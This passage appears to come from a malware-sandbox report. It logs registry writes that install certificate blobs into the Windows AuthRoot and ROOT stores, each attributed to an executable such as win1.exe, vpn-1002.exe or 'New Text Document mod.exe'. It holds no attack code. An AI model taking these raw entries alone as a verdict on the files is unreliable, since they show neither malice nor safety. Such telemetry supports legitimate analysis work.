010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	win1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	vpn-1002.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	kat41D1.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	kat41D1.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	win1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	kat3C07.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	kat3C07.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	kat3C07.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	kat3C07.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	eagleget-2-1-6-50.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	eagleget-2-1-6-50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	win1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	vpn-1002.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 